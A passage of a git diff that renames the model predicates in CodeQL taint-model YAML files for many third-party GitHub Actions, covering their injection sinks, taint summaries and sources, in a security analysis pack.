b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index ae408b131e0..9b02577be7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] @@ -9,6 +9,6 @@ extensions: - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index c7e2cf41b3f..1ffc3df1c81 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 781384a2fe1..53ed1840b0a 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 9036f199f42..17d2ed2e473 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 7eee95dbcce..68c2552c350 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 4fe9e32ce52..977f6b98ae4 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 0352ece87b5..616f7fdb9ca 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index 712f2ce3395..e4961ae5ed6 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 45c00c1c30e..19cce83c691 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index 8f05918155e..f838eeed0eb 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 708c310c05f..48e5b05128f 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 76177635899..448997b3136 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 7106115c17a..13af446f37d 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 366e5dd1766..39e1c9ef624 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a469063fc50..a442ed5cd53 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index d0d5b57574b..a22fce01c45 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 3151e335d22..74a5c7d592c 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e74f953a1a1..e78dfb3b073 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 0930fc246c3..29dac5cffea 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index 5b344799ad9..f2331633485 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index 5b6f1342fc4..e492f601278 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b34833d85f3..a821b049232 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 9a58d9a764f..4f9f887caf1 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 74ef5820cb7..365f3ac98f8 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index e05a3afd63a..f42e8465533 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index a96ad45d624..e21b5224166 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index a70e8facf7c..6c4a5931b98 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 66280f8bdd6..c7e89697afb 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index 65965daeb1d..aa849603836 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ba9a04f588b..ae869b6b531 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index aea054e24b0..9f5801b79c0 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index c8646cffe8e..a4a473b8efd 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index bb1c3ffca2a..10a03e4d186 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index d3bec5ea39d..9af82b985f3 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index c65527150b5..3b779d0b86d 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 25565b445fc..6ad087730e4 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index d46a07dde96..fa9c1958352 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 2d162fbc914..6bfaffb2bba 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index fc91bacdb72..03fa8beaf0b 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index 8b2b4e79afa..a4ccaac2d2e 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2ea1fdf6855..7c32705dde5 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 21e0d819db7..902483f4399 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index bcc8ce6b80d..be86a330b97 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 741ab37eb9b..0a6f7c34722 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index a9d6b80a627..613b3e0fc59 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 73d4df99af2..489d47ac71e 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index fb6ae5102e1..4a98ecd4af1 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 8b29e5c9988..57dc40ef6b8 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 5a5cedcaca5..3b92f667ae9 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index d156d7da658..da8b02312ea 100644 --- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index 12d3f23f8fd..c06d13301d2 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 30be564c42a..61935c36f7d 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 13d4cfeb814..89f61cedc42 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] - 